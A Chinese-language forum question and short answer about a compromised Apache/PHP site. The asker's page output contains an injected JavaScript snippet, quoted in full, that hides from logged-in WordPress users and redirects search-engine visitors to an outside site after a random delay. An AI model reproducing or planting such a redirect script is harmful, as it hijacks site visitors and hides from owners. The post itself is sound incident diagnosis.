我正在运行 Apache/2.4.29 和 PHP 7.2.24。我有以下简单的 PHP 文档:
<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
<? passthru("uuidgen")?>
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
但是,当我使用以下命令通过 curl 获取它时:curl wasteaguid.info
我得到以下输出:
<html>
</head>
<title>Waste-A-GUID</title>
</head>
<body>
<script>((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(20000, 60000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();</script><center>
<h1>Waste-A-GUID</h1>
<h3>Once they are gone, they're gone for good</h3>
<p>
<h1>
19489a02-7bd3-43e5-930d-04230b8624b0
</h1>
<h3>Thank You for making one less GUID available to the rest of us!</h3>
</center>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-197242-9");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
这种情况并不经常发生。那个额外的脚本是怎么进来的?显然我的网站已被入侵,我应该购买一台新服务器并重建它。但是,我需要将 html/php 文档和服务器配置复制到新服务器。我不想将漏洞也复制过来。它应该在哪里,这样我就不会复制它?在运行 PHP 文件时,什么可以对其进行预处理?
答案1
如果您有网站的旧副本,您可以进行比较以查看哪些内容发生了变化。代码损坏的风险是始终将您的核心代码 + 内容保存在安全位置的主要原因。
html、javascript、css 和 php 可能被恶意修改。图像和字体文件可能隐藏病毒。数据库下载(例如来自 wordpress 等)可能包含恶意添加内容。网站维护脚本可能被黑客入侵。